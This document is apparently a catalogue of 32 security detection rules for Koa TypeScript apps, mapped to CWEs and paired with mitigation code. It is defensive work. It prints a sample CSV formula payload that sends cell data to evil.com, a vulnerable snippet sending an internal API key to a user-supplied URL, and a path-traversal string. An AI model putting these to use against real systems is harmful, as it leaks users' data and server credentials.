# Koa (TypeScript) Security

Security vulnerabilities and detection rules for the Koa framework. 32 rules across 23 CWE categories.

- Total rules: 32
- CWE categories: 23
- Critical rules: 10

## CWEs

- **CWE-798**: Use of Hard-coded Credentials
- **CWE-639**: Authorization Bypass Through User-Controlled Key
- **CWE-20**: Improper Input Validation
- **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
- **CWE-1321**: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
- **CWE-78**: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- **CWE-79**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- **CWE-89**: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- **CWE-93**: Improper Neutralization of CRLF Sequences ('CRLF Injection')
- **CWE-113**: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
- **CWE-176**: Improper Handling of Unicode Encoding
- **CWE-201**: Insertion of Sensitive Information Into Sent Data
- **CWE-208**: Observable Timing Discrepancy
- **CWE-287**: Improper Authentication
- **CWE-391**: Unchecked Error Condition
- **CWE-532**: Insertion of Sensitive Information into Log File
- **CWE-601**: URL Redirection to Untrusted Site ('Open Redirect')
- **CWE-636**: Not Failing Securely ('Failing Open')
- **CWE-670**: Always-Incorrect Control Flow Implementation
- **CWE-1069**: Empty Exception Block
- **CWE-1236**: Improper Neutralization of Formula Elements in a CSV File
- **CWE-1333**: Inefficient Regular Expression Complexity

## Rules

- **Business Logic Input Validation** [MEDIUM]: Detects business-critical values (discount, refund, quantity) used without validation.
- **Command Injection via child_process** [CRITICAL]: Detects user input flowing to shell command execution functions.
- **CSV Injection (Formula Injection)** [MEDIUM]: Detects untrusted data being placed into CSV output, which can enable formula injection
when the CSV is opened in spreadsheet software like Excel or Google Sheets.

CSV injection occurs when user-controlled data containing formula characters (=, +, -, @, \t, \r)
is written to a CSV file without proper escaping. When opened in spreadsheet software,
these formulas can execute arbitrary commands or exfiltrate data.

Example attack payload: `=HYPERLINK("http://evil.com/"&A1, "Click")`
This creates a clickable link that sends the contents of cell A1 to the attacker.
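
One common mitigation can be sketched as follows. The helper name `neutralizeCsvCell` and the choice of a leading single quote are assumptions for illustration; this is not necessarily what the rule expects as a fix.

```typescript
// Characters that spreadsheet software may treat as the start of a formula.
const FORMULA_PREFIXES = ["=", "+", "-", "@", "\t", "\r"];

// Hypothetical helper: neutralizes one cell value before it is written to CSV.
function neutralizeCsvCell(value: string): string {
  // Prefix a single quote so the spreadsheet treats the cell as plain text.
  const startsWithFormula = FORMULA_PREFIXES.some((p) => value.indexOf(p) === 0);
  const guarded = startsWithFormula ? "'" + value : value;
  // Standard CSV quoting: double embedded quotes and wrap the field in quotes.
  return '"' + guarded.replace(/"/g, '""') + '"';
}
```

Each user-controlled field would pass through this helper before the row is joined with commas.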
- **Email Header Injection** [HIGH]: Detects email header injection vulnerabilities where user input flows into
email headers (To, From, Subject, Cc, Bcc) without validation. Attackers can
inject CRLF sequences (\r\n) to add arbitrary headers or body content.

Attack impact:
- Send spam/phishing emails via your server
- Add hidden recipients (Cc/Bcc injection)
- Modify email content
- Bypass spam filters using your domain reputation

Common vulnerable patterns:
- nodemailer with user-controlled options
- SendGrid/Mailgun APIs with user input
- Custom SMTP implementations
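
A minimal sketch of rejecting CRLF sequences before a value reaches a mail library. The helper `assertSafeHeaderValue` is hypothetical and independent of any particular mail API.

```typescript
// Hypothetical helper: validates a value before it is used as an email header.
function assertSafeHeaderValue(field: string, value: string): string {
  // A CR or LF would let an attacker end the header and start a new one.
  if (/[\r\n]/.test(value)) {
    throw new Error("Invalid characters in " + field);
  }
  return value;
}
```

The same check applies to values written into HTTP response headers.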
- **Empty Catch Block** [MEDIUM]: Detects empty catch blocks that silently swallow exceptions without
any error handling, logging, or recovery logic.

Empty catch blocks hide errors and make debugging extremely difficult.
They can mask security issues, data corruption, and system failures.
- **Hardcoded Secret in Environment Variable Fallback** [HIGH]: Detects hardcoded secrets used as fallback values for environment variables.

Pattern: `process.env.SECRET || 'hardcoded-value'`

This is dangerous because:
- If the environment variable is not set, the hardcoded value is used
- Developers often forget to set env vars in production
- The hardcoded fallback may be committed to version control
- It creates a false sense of security ("we use env vars")

This is particularly common with:
- JWT secrets
- API keys
- Database passwords
- Encryption keys
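
Instead of a fallback, the application can refuse to start when a secret is missing. The sketch below assumes a hypothetical `requireEnv` helper; the environment is passed in explicitly so the function is easy to test.

```typescript
type Env = Record<string, string | undefined>;

// Hypothetical helper: returns the variable or throws; it never falls back to a literal.
function requireEnv(env: Env, key: string): string {
  const value = env[key];
  if (value === undefined || value === "") {
    throw new Error("Missing required environment variable: " + key);
  }
  return value;
}

// Usage at startup (assumed variable name):
// const jwtSecret = requireEnv(process.env, "JWT_SECRET");
```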
- **Environment Variable Secret Exposure** [HIGH]: Detects when environment variables (which may contain secrets like API keys,
passwords, tokens) are leaked through logging, HTTP responses, or external requests.

Environment variables commonly store sensitive data:
- API keys (AWS_ACCESS_KEY_ID, STRIPE_SECRET_KEY)
- Database passwords (DB_PASSWORD, DATABASE_URL)
- JWT secrets (JWT_SECRET)
- OAuth tokens (GITHUB_TOKEN, SLACK_TOKEN)

Leaking these values exposes credentials and allows unauthorized access.

This rule uses taint flow analysis to detect when process.env flows to:
- Logging functions (console.log, winston, etc.)
- HTTP responses (res.send, res.json, or `ctx.body` in Koa)
- External HTTP requests
- Client-side code (sent to browser)
- **Failing Open on Security Check Errors** [CRITICAL]: Detects security checks (authentication, authorization, validation) that grant
access when an error occurs instead of denying it. This is a critical security
flaw where the system "fails open" rather than "failing closed/secure".

When authentication or authorization checks encounter errors, the system should
DENY access by default, not grant it.
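
A fail-closed check might look like the sketch below. `PermissionCheck` and `isAllowed` are hypothetical names; the point is only that the `catch` path denies access.

```typescript
// Hypothetical permission lookup; it may throw if the backing store is unavailable.
type PermissionCheck = (userId: string, resource: string) => Promise<boolean>;

async function isAllowed(
  check: PermissionCheck,
  userId: string,
  resource: string
): Promise<boolean> {
  try {
    // Only an explicit `true` grants access.
    return (await check(userId, resource)) === true;
  } catch (err) {
    // Fail closed: an error during the check is treated as a denial.
    console.error("authorization check failed", err);
    return false;
  }
}
```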
- **Hardcoded Credentials** [HIGH]: Detects hardcoded credentials (passwords, API keys, tokens) in database connections
and configuration objects. Credentials should be loaded from environment variables
or secure secret management systems.

This is related to, but broader than, CWE-259 (Use of Hard-coded Password):
- CWE-798: Any credential hardcoded in source code (security risk)
- CWE-259: Specifically hard-coded passwords (weak or guessable passwords are a separate issue, covered by CWE-521)

Even a "strong" password is a security risk if hardcoded because:
- It gets committed to version control
- It's difficult to rotate
- It may leak via logs, error messages, or decompilation
- No separation between dev/prod environments
- **Hardcoded High-Entropy Secrets Detection** [CRITICAL]: Detects hardcoded secrets with high entropy (randomness) that indicate real credentials.

This rule uses entropy analysis to avoid false positives from:
- Example/placeholder values ("keyboard cat", "your-secret-here")
- Test fixtures ("test123", "fake-api-key")
- Short/simple strings ("secret", "password")

Only flags strings that appear to be REAL secrets:
- High entropy (random-looking characters)
- Sufficient length (20+ characters for API keys)
- Known secret patterns (AWS keys, JWT tokens, private keys)

Hardcoded real secrets pose security risks:
- Exposure in version control
- Difficult credential rotation
- Accidental disclosure in logs/errors
- No dev/prod separation
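
The entropy idea can be illustrated with a Shannon entropy calculation. The thresholds below (20 characters, 3.5 bits per character) are assumptions for this sketch, not the rule's actual configuration.

```typescript
// Shannon entropy in bits per character.
function shannonEntropy(s: string): number {
  const counts: Record<string, number> = {};
  for (let i = 0; i < s.length; i++) {
    const ch = s.charAt(i);
    counts[ch] = (counts[ch] || 0) + 1;
  }
  let bits = 0;
  for (const ch of Object.keys(counts)) {
    const p = counts[ch] / s.length;
    bits -= p * Math.log2(p);
  }
  return bits;
}

// Hypothetical heuristic: long enough and random-looking enough.
function looksLikeSecret(s: string, minLength = 20, minBitsPerChar = 3.5): boolean {
  return s.length >= minLength && shannonEntropy(s) >= minBitsPerChar;
}
```

Placeholder strings such as "keyboard cat" repeat a small set of characters, so they score low even when they are long.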
- **Hardcoded Secrets in Security Operations** [CRITICAL]: Detects hardcoded secrets (API keys, tokens, passwords) flowing into security-sensitive
operations. Uses taint analysis to track hardcoded secret strings from their definition
to actual usage in authentication, API calls, or cryptographic operations.

This approach reduces false positives by only flagging secrets that are actually used,
not just defined in comments, examples, or unused variables.
- **HTTP Header Injection (Response Splitting)** [HIGH]: Detects user input flowing into HTTP response headers without CRLF sanitization.
- **Horizontal Privilege Escalation** [CRITICAL]: Detects when user-controlled input is used to access resources belonging to other users
at the same privilege level without verifying ownership.
- **Insecure Direct Object Reference (IDOR)** [HIGH]: Detects when user-controlled input (from URL parameters, query strings, or request body)
is used directly to access database records without verifying that the authenticated
user has permission to access that specific resource.

IDOR vulnerabilities allow attackers to access, modify, or delete resources belonging
to other users by manipulating identifiers in requests.
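
A sketch of an ownership check, using an in-memory `Map` as a stand-in for a database. The `Invoice` shape and `getInvoiceForUser` are hypothetical; in a Koa handler the authenticated user ID would typically come from session or token middleware rather than from the request parameters.

```typescript
interface Invoice {
  id: string;
  ownerId: string;
  total: number;
}

// Hypothetical in-memory store standing in for a database table.
const invoices = new Map<string, Invoice>();
invoices.set("inv-1", { id: "inv-1", ownerId: "alice", total: 100 });

function getInvoiceForUser(invoiceId: string, authenticatedUserId: string): Invoice | undefined {
  const invoice = invoices.get(invoiceId);
  // Same result for "missing" and "not yours", so identifiers cannot be probed.
  if (!invoice || invoice.ownerId !== authenticatedUserId) {
    return undefined;
  }
  return invoice;
}
```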
- **Potential IDOR - Generic Data Access** [MEDIUM]: Detects endpoints where route parameters flow to generic data access patterns
(Map.get, object property access, cache lookups, custom repositories) without
visible ownership verification in the function.

This rule catches patterns that ORM-specific detection misses, but requires
human verification that authorization is not enforced elsewhere (middleware,
decorators, API gateway, etc.).

**This is a "potential" finding - verify authorization exists somewhere.**
- **JWT Decode Used for User Identity (Authentication Bypass)** [CRITICAL]: Detects when jwt.decode() output is used for user identity, allowing complete authentication bypass since decode() does not verify signatures.
- **Open Redirect via Untrusted URLs** [MEDIUM]: Detects user input flowing into redirect functions without URL validation.
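
One way to validate a redirect target is to accept only same-site paths. In this sketch, `safeRedirectTarget` and the placeholder base origin are assumptions; the target is resolved with the WHATWG `URL` parser and rejected if it leaves that origin.

```typescript
// Placeholder origin used only to resolve relative targets.
const REDIRECT_BASE = "http://internal.invalid";

// Hypothetical helper: returns a same-site path, or the fallback for anything else.
function safeRedirectTarget(target: string, fallback = "/"): string {
  try {
    const url = new URL(target, REDIRECT_BASE);
    // Absolute URLs, "//host" and "/\host" all resolve to a different origin.
    if (url.origin !== REDIRECT_BASE) {
      return fallback;
    }
    return url.pathname + url.search + url.hash;
  } catch (err) {
    return fallback;
  }
}

// Possible use in a Koa handler: ctx.redirect(safeRedirectTarget(String(ctx.query.next)));
```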
- **Path Traversal in File Operations** [CRITICAL]: Detects untrusted user input used in file system operations without proper validation.
This can allow attackers to read or write arbitrary files on the server.
- **Prototype Pollution via Object Manipulation** [HIGH]: Detects user input flowing to object merge operations without filtering dangerous keys.
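
Filtering dangerous keys during a merge can be sketched as below. `safeMerge` is a hypothetical helper, and the blocked-key list is the commonly cited set rather than something taken from the rule definition.

```typescript
const BLOCKED_KEYS = ["__proto__", "constructor", "prototype"];

type PlainObject = { [key: string]: unknown };

function isPlainObject(value: unknown): value is PlainObject {
  return typeof value === "object" && value !== null && !Array.isArray(value);
}

// Recursively copies `source` into `target`, skipping keys that reach the prototype chain.
function safeMerge(target: PlainObject, source: PlainObject): PlainObject {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.indexOf(key) !== -1) {
      continue;
    }
    const value = source[key];
    const existing = target[key];
    if (isPlainObject(value)) {
      target[key] = safeMerge(isPlainObject(existing) ? existing : {}, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}
```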
- **Prototype Pollution Gadget - Unsafe Property Trust** [MEDIUM]: Detects authorization checks that trust properties without verifying they are own properties.
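
An own-property check might be sketched as follows. `hasOwnFlag` is a hypothetical helper that only trusts a flag when it is set directly on the object rather than inherited.

```typescript
// Returns true only if `flag` is an own property of `obj` and is exactly `true`.
function hasOwnFlag(obj: object, flag: string): boolean {
  return (
    Object.prototype.hasOwnProperty.call(obj, flag) &&
    (obj as { [key: string]: unknown })[flag] === true
  );
}
```

A plain `if (user.isAdmin)` would also accept a value inherited from a polluted prototype, which is the gadget this rule describes.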
- **Regular Expression Denial of Service (ReDoS)** [HIGH]: Detects potentially catastrophic regular expressions that could lead to ReDoS attacks.

ReDoS occurs when regular expressions with certain patterns cause exponential backtracking,
leading to excessive CPU consumption. Evil regexes typically contain:

1. Nested quantifiers (e.g., (a+)+, (a*)*)
2. Alternation with overlapping patterns (e.g., (a|ab)*, (a|a)*)
3. Grouping with repetition where the group can match the same input in multiple ways
4. Complex patterns with overlapping possibilities that cause catastrophic backtracking

When user input is matched against these patterns, an attacker can craft input that
causes the regex engine to take exponential time, effectively causing a denial of service.
- **Sensitive Data Exposure in Logs** [MEDIUM]: Detects when user-provided sensitive data (passwords, tokens, API keys, secrets, etc.)
flows directly into logging functions without proper redaction or masking.

This rule uses taint flow analysis to detect ACTUAL sensitive data being logged,
not just variables with sensitive names. Only triggers when:
1. Data originates from user input (req.body, req.headers, or Koa equivalents such as ctx.request.body)
2. Contains sensitive field names (password, token, secret, etc.)
3. Flows into logging functions without sanitization

Sensitive data in logs can lead to:
- Credential exposure in log files or monitoring systems
- Unauthorized access if logs are compromised
- Compliance violations (PCI-DSS, GDPR, HIPAA)
- Data breaches through log aggregation systems
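
Redaction before logging can be sketched as below. The key pattern and the `redact` helper are assumptions for illustration; real projects often rely on their logger's own redaction support.

```typescript
// Field names treated as sensitive in this sketch.
const SENSITIVE_KEY = /password|token|secret|api[-_]?key|authorization/i;

// Returns a copy of `value` with sensitive fields replaced by a marker.
function redact(value: unknown): unknown {
  if (Array.isArray(value)) {
    return value.map((item) => redact(item));
  }
  if (typeof value === "object" && value !== null) {
    const source = value as { [key: string]: unknown };
    const out: { [key: string]: unknown } = {};
    for (const key of Object.keys(source)) {
      out[key] = SENSITIVE_KEY.test(key) ? "[REDACTED]" : redact(source[key]);
    }
    return out;
  }
  return value;
}

// Possible use: console.log("login attempt", redact(ctx.request.body));
```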
- **Sensitive Field Exposure in API Response** [CRITICAL]: Detects when sensitive data fields (passwords, tokens, secrets, API keys) are
exposed through API endpoint responses. This commonly happens when:

1. Mapping user data with sensitive fields: `.map(u => ({ password: u.password }))`
2. Returning entire user objects: `res.json(user)` where user has password field
3. Including sensitive fields in response objects: `res.json({ password: user.password })`

This is particularly dangerous when AI-generated code returns user collections
without filtering sensitive fields, as in debug endpoints or admin panels.

Security Impact:
- Password hash exposure enabling offline cracking attacks
- API key/token leakage allowing account takeover
- Session token exposure enabling session hijacking
- PII disclosure violating privacy regulations (GDPR, CCPA)
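
An allowlist mapping is one way to avoid returning whole records. The `UserRecord` and `PublicUser` shapes below are hypothetical.

```typescript
interface UserRecord {
  id: string;
  email: string;
  passwordHash: string;
  apiKey: string;
}

interface PublicUser {
  id: string;
  email: string;
}

// Copies only the fields that are safe to expose; new sensitive fields stay hidden by default.
function toPublicUser(user: UserRecord): PublicUser {
  return { id: user.id, email: user.email };
}

// Possible use in a Koa handler: ctx.body = users.map(toPublicUser);
```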
- **SQL Injection via Database Queries** [CRITICAL]: Detects user input flowing into SQL queries without parameterization.
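
Parameterization keeps user input out of the SQL text. The sketch below builds a query object in the `{ text, values }` shape with `$1` placeholders accepted by node-postgres; the table, columns, and function name are assumptions, and other drivers use different placeholder syntax.

```typescript
interface ParameterizedQuery {
  text: string;
  values: unknown[];
}

// Vulnerable alternative (do not use): "... WHERE email = '" + email + "'"
function findUserByEmailQuery(email: string): ParameterizedQuery {
  return {
    // The SQL text is a constant; the driver sends the value separately.
    text: "SELECT id, email FROM users WHERE email = $1",
    values: [email],
  };
}
```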
- **Timing Attack via Direct Cryptographic Comparison** [MEDIUM]: Detects direct string comparison of cryptographic values (HMAC, signatures, hashes)
where timing attacks are practically exploitable.

This rule focuses on HIGH-RISK patterns where timing attacks have been demonstrated
in real-world attacks:
- HMAC/signature verification (webhook signatures, JWT manual verification)
- Hash comparison (when verifying pre-computed hashes)

NOT flagged (low practical risk over network):
- Password comparison: Network jitter (ms) overwhelms timing differences (ns).
  The real fix is using bcrypt/argon2 which handles this automatically.
- General token comparison: Usually better addressed by secure token generation
  and proper session management.

Timing attacks on cryptographic comparisons are practical because:
1. Attacker controls the input format exactly
2. Signatures have known structure (hex/base64)
3. Can be automated with statistical analysis
4. Have been used in real attacks (GitHub, Slack webhook bypasses)
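
A constant-time comparison using Node's built-in `crypto.timingSafeEqual` might look like this. The HMAC-SHA256 scheme, hex encoding, and function names are assumptions about a typical webhook setup.

```typescript
import { createHmac, timingSafeEqual } from "node:crypto";

// Computes the hex HMAC-SHA256 signature for a payload.
function signPayload(payload: string, secret: string): string {
  return createHmac("sha256", secret).update(payload).digest("hex");
}

// Verifies a received hex signature without an early-exit string comparison.
function verifySignature(payload: string, signatureHex: string, secret: string): boolean {
  const expected = createHmac("sha256", secret).update(payload).digest();
  const received = Buffer.from(signatureHex, "hex");
  // timingSafeEqual throws on length mismatch, so compare lengths first.
  if (received.length !== expected.length) {
    return false;
  }
  return timingSafeEqual(received, expected);
}
```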
- **JavaScript Test with Trivial Always-Passing Assertion** [MEDIUM]: Detects JavaScript test functions that only contain trivial assertions or no assertions at all.
These tests provide no actual validation and give false confidence about code correctness.
Common patterns include expect(true).toBe(true), assert(true), or tests with only comments.
- **Unhandled Promise Rejection** [HIGH]: Detects promises that are created or called without proper rejection handlers.
Unhandled promise rejections can cause application crashes, expose sensitive error
information, and lead to inconsistent application state.

Since Node.js 15, an unhandled promise rejection terminates the process by default,
making this a critical reliability and security issue.
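
For background work that is not awaited, a rejection handler can be attached explicitly. `runInBackground` is a hypothetical helper name.

```typescript
// Hypothetical helper for background ("fire-and-forget") work.
function runInBackground(
  task: Promise<unknown>,
  onError: (err: unknown) => void
): Promise<void> {
  // Attaching a rejection handler means the rejection is never left unhandled.
  return task.then(
    () => {},
    (err) => {
      onError(err);
    }
  );
}
```

In request handlers, awaiting the promise inside `try`/`catch` achieves the same result.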
- **Unicode Normalization Security Issues** [MEDIUM]: Detects missing Unicode normalization in security-sensitive string comparisons.
Unicode allows multiple representations of visually identical characters, which
attackers can exploit to bypass input validation, authentication, or access control.

Common attack vectors:
- Homograph attacks (using lookalike characters): "аdmin" vs "admin" (Cyrillic 'а')
- Case folding differences: "ß" (German sharp s) becomes "SS" when uppercased
- Combining characters: "é" can be a single char or 'e' + combining accent
- Full-width characters: "ａｄｍｉｎ" vs "admin"

Always normalize Unicode strings using String.prototype.normalize() before
security-sensitive comparisons.
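
A sketch of normalizing before comparison. The choice of the NFKC form and lowercasing is an assumption that suits identifiers such as usernames; other data may need a different form.

```typescript
// Hypothetical helper: canonical form used for lookups and comparisons.
function canonicalUsername(input: string): string {
  // NFKC folds compatibility characters (for example full-width letters) and composes accents.
  return input.normalize("NFKC").toLowerCase();
}
```

Normalization does not map lookalike characters from other scripts (such as Cyrillic 'а') to their Latin counterparts, so homograph attacks need a separate check, for example restricting the allowed character set.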
- **Unvalidated Business-Critical Values** [HIGH]: Detects business-critical values from user input used without validation.
- **Credential Exfiltration via User-Controlled Endpoint** [CRITICAL]: Detects when internal credentials (API keys, secrets, tokens) are sent in HTTP requests
to user-controlled endpoints. This allows attackers to exfiltrate server credentials
by providing a malicious webhook URL that captures the sensitive headers or body data.

Example vulnerable pattern:
```javascript
// User controls 'endpoint' from request
const endpoint = req.body.webhookUrl;

// Server sends its internal API key to attacker-controlled URL
await fetch(endpoint, {
  headers: { 'X-API-Key': process.env.INTERNAL_API_KEY }
});
```

This differs from standard SSRF, which accesses internal resources: here the attacker
exfiltrates server credentials to an endpoint they control.
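
One mitigation is to attach credentials only when the destination is on a host allowlist. The host name and `isTrustedEndpoint` helper below are hypothetical.

```typescript
// Hypothetical allowlist of hosts that may receive internal credentials.
const TRUSTED_HOSTS = ["hooks.partner.example"];

function isTrustedEndpoint(rawUrl: string): boolean {
  try {
    const url = new URL(rawUrl);
    // Compare the parsed hostname, not a substring of the raw string.
    return url.protocol === "https:" && TRUSTED_HOSTS.indexOf(url.hostname) !== -1;
  } catch (err) {
    // Unparseable URLs are never trusted.
    return false;
  }
}
```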
- **Cross-Site Scripting (XSS) via Response** [HIGH]: Detects user input flowing into HTTP responses without proper encoding or sanitization.
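
A minimal HTML-escaping sketch for values placed in element content or quoted attributes. `escapeHtml` is a hypothetical helper; template engines with auto-escaping are usually a better choice.

```typescript
// Escapes the characters that are significant in HTML text and quoted attributes.
function escapeHtml(text: string): string {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Possible use in a Koa handler: ctx.body = "<p>Hello, " + escapeHtml(name) + "</p>";
```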
- **Zip Slip Path Traversal** [HIGH]: Detects unsafe extraction of zip/tar archives without path validation,
which can lead to arbitrary file writes via path traversal (Zip Slip).

Zip Slip is a form of path traversal attack where a malicious archive contains
entries with paths like "../../../etc/passwd" that escape the intended extraction
directory and overwrite arbitrary files on the system.

Vulnerable patterns:
1. Extracting zip entries without validating the extracted path
2. Not checking if extracted path is inside target directory
3. Trusting entry.fileName from the archive
4. Not normalizing/resolving paths before extraction

Impact:
- Arbitrary file overwrite (RCE if overwriting .bashrc, cron jobs, etc.)
- Configuration tampering
- Code injection (overwriting source files)
- Log tampering (overwriting log files)
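
The containment check can be sketched with Node's `path` module. `resolveEntryPath` is a hypothetical helper that an extraction loop would call for every entry before writing it.

```typescript
import * as path from "node:path";

// Resolves an archive entry name against the target directory and rejects escapes.
function resolveEntryPath(targetDir: string, entryName: string): string {
  const root = path.resolve(targetDir);
  const destination = path.resolve(root, entryName);
  // The destination must be the root itself or sit below it.
  if (destination !== root && destination.indexOf(root + path.sep) !== 0) {
    throw new Error("Blocked archive entry outside target directory: " + entryName);
  }
  return destination;
}
```

The same check applies to any file operation that joins a base directory with a user-supplied path.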